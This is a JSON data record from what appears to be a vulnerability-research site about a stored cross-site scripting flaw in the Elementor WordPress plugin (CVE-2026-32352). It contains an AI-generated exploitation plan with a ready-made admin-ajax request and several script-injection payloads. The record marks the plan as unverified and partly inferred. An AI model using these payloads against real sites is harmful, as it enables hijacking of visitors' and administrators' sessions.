[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0FwQAf003Rl3JmmZK5ANUyMbF92MuJFQsoXSndXDGXg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-32352","elementor-website-builder-authenticated-contributor-stored-cross-site-scripting-3","Elementor Website Builder \u003C= 3.35.5 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","elementor",null,"\u003C=3.35.5","3.35.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-13 00:00:00","2026-04-15 21:04:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbc51ccec-558c-4155-a309-badf99202ce1?source=api-prod",62,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32352 (Elementor Stored XSS)\n\n## 1. Vulnerability Summary\n**CVE-2026-32352** is a Stored Cross-Site Scripting (XSS) vulnerability in the **Elementor Website Builder** plugin (versions \u003C= 3.35.5). The vulnerability exists because the plugin fails to sufficiently sanitize and escape user-provided input within the Elementor editor's widget settings before saving them to the database and subsequently rendering them on the frontend. Specifically, certain widget properties (like custom attributes, URLs, or tag names) allow a Contributor-level user to inject arbitrary JavaScript payloads.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `elementor_ajax`\n- **Internal Action**: `save_builder_data` (within the `elementor_ajax` request)\n- **Vulnerable Parameter**: `data` (specifically the `elements` or `settings` JSON structure within the `_elementor_data` post meta).\n- **Authentication Level**: Authenticated, Contributor or higher. Contributors in WordPress have the `edit_posts` capability, allowing them to use the Elementor editor on their own posts.\n- **Preconditions**: The Elementor editor must be active for the post type being edited.\n\n## 3. Code Flow\n1.  **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=elementor_ajax`.\n2.  **AJAX Handler**: Elementor's `Ajax::handle_ajax_request` (in `includes\u002Fajax.php`) receives the request.\n3.  **Command Execution**: The request contains a `commands` object. The `save_builder_data` command is triggered.\n4.  **Persistence**: The `Documents\\Base\\Document::save_elements` or `Documents\\Base\\Document::save_settings` methods are called. The input data (JSON) is processed and saved into the `_elementor_data` post meta using `update_metadata`.\n5.  **Lack of Sanitization**: During the saving process, certain widget-specific settings (inferred: custom HTML tags or link attributes) are not passed through rigorous sanitization filters like `wp_kses` or `esc_attr`.\n6.  **Rendering (Sink)**: When a user (e.g., an Admin) views the page, the `Frontend::get_builder_content` method retrieves the saved JSON, parses it, and renders the HTML. The malicious script is echoed directly into the DOM without escaping (e.g., inside an attribute or as part of a raw HTML tag).\n\n## 4. Nonce Acquisition Strategy\nElementor requires a nonce for its AJAX operations, typically named `elementor_ajax_nonce`. \n\n1.  **Identify Shortcode\u002FTrigger**: Elementor loads its configuration on any page where the editor is active or where Elementor content is rendered.\n2.  **Create Test Page**: \n    ```bash\n    wp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_author=CONTRIBUTOR_ID --post_content='\u003C!-- wp:elementor\u002Fcanvas --> '\n    ```\n3.  **Access Editor**: Navigate to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n4.  **Extract Nonce via Browser**:\n    Use `browser_eval` to extract the nonce from the localized configuration object:\n    - `browser_eval(\"window.elementorCommon?.config?.ajax?.nonce\")`\n    - OR `browser_eval(\"window.elementorConfig?.ajax?.nonce\")`\n    - OR `browser_eval(\"window.elementorConfig?.nonces?.editor\")`\n\n## 5. Exploitation Strategy\nThe goal is to send a crafted JSON payload via the `elementor_ajax` action to update a post's content with a malicious widget.\n\n### Step-by-Step Plan:\n1.  **Authenticate**: Login as a Contributor.\n2.  **Create Post**: Create a new post to get a `POST_ID`.\n3.  **Obtain Nonce**: Use the strategy in Section 4 to get the `elementor_ajax_nonce`.\n4.  **Craft Payload**: Prepare a JSON payload for the `elementor_ajax` request. We will target the `Heading` widget's `header_tag` or a widget's `custom_attributes`.\n\n**HTTP Request (Example Targeting Custom Attributes):**\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  action=elementor_ajax&\n  _nonce=NONCE_VALUE&\n  actions={\"save_builder_data\":{\"action\":\"save_builder_data\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"id_here\",\"elType\":\"section\",\"settings\":{},\"elements\":[{\"id\":\"id_2\",\"elType\":\"column\",\"settings\":{},\"elements\":[{\"id\":\"id_3\",\"elType\":\"widget\",\"widgetType\":\"heading\",\"settings\":{\"title\":\"Hacked\",\"custom_attributes\":\"onclick|alert(document.domain) style|display:block;width:100%;height:100px;background:red\"},\"elements\":[]}]}]}]},\"id\":\"POST_ID\"}}\n  ```\n  *(Note: The `custom_attributes` field in Elementor often uses a pipe `|` format: `key|value`.)*\n\n5.  **Trigger Execution**: Navigate to the published post URL: `http:\u002F\u002FTARGET\u002F?p=POST_ID`.\n\n## 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Elementor Settings**: Ensure \"Contributor\" is allowed to use Elementor (Role Manager in Elementor settings).\n    ```bash\n    # This might be necessary if Elementor restricts the editor to Authors\u002FAdmins by default\n    wp option update elementor_role_manager_contributor \"\" \n    ```\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` with a JSON response containing `{\"success\":true,...}`.\n- When viewing the post, the HTML should contain the injected attribute: `\u003Ch2 ... onclick=\"alert(document.domain)\" ...>`.\n- Clicking or hovering (depending on the attribute) should trigger the JavaScript alert.\n\n## 8. Verification Steps\n1.  **Check Database**: Verify the payload is stored in the post meta.\n    ```bash\n    wp post meta get POST_ID _elementor_data\n    ```\n2.  **Search for Payload**:\n    ```bash\n    wp post meta get POST_ID _elementor_data | grep \"alert(document.domain)\"\n    ```\n\n## 9. Alternative Approaches\nIf `custom_attributes` is sanitized in version 3.35.5, target the `html_tag` property of the `Heading` or `Text Path` widgets:\n- **Payload**: Change `settings` to `{\"title\":\"XSS\", \"header_tag\":\"script src=data:,alert(1)\u002F\u002F\"}`.\n- Some Elementor widgets allow raw HTML if the user has `unfiltered_html`, but Contributors do not. This vulnerability bypasses that restriction by finding a field that *should* be escaped for Contributors but isn't.\n- **Check Video Widget**: Inject into the `external_url` or `vimeo_url` using `javascript:alert(1)`.","The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 3.35.5. Contributor-level attackers can use the Elementor editor's AJAX interface to save malicious widget settings, such as 'custom_attributes' or 'header_tag', which are rendered without proper sanitization on the frontend.","1. Authenticate as a Contributor-level user and identify a post that can be edited with Elementor.\n2. Obtain a valid Elementor AJAX nonce by inspecting the 'window.elementorConfig' object in the browser context of the editor.\n3. Construct a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'elementor_ajax' and the '_nonce' parameter populated.\n4. Include a 'save_builder_data' command in the 'actions' parameter, containing a JSON structure for a widget (e.g., 'heading') where settings like 'custom_attributes' or 'header_tag' contain malicious JavaScript (e.g., 'onmouseover|alert(document.domain)').\n5. Submit the request and then view the published post to trigger the script execution in the context of the user's browser.","gemini-3-flash-preview","2026-04-20 23:53:53","2026-04-20 23:55:49",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","3.35.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags\u002F3.35.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementor.3.35.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags\u002F3.35.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementor.3.35.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementor\u002Ftags"]